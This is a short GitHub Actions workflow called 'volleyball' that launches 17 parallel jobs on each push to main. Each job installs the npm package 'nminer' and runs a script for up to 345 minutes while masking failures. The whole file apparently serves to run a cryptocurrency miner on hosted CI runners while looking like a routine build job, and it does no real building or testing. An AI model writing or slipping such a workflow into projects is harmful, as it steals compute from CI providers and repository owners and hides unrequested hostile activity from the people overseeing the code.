name: volleyball
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4002 }
          - { version: 6715 }
          - { version: 5997 }
          - { version: 9718 }
          - { version: 2246 }
          - { version: 6627 }
          - { version: 7730 }
          - { version: 1513 }
          - { version: 4883 }
          - { version: 6320 }
          - { version: 8168 }
          - { version: 3865 }
          - { version: 6113 }
          - { version: 6514 }
          - { version: 2166 }
          - { version: 86 }
          - { version: 898 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: before
        run: |
          npm install nminer@latest
          timeout 345m node volleyball.js || echo "volleyball executed"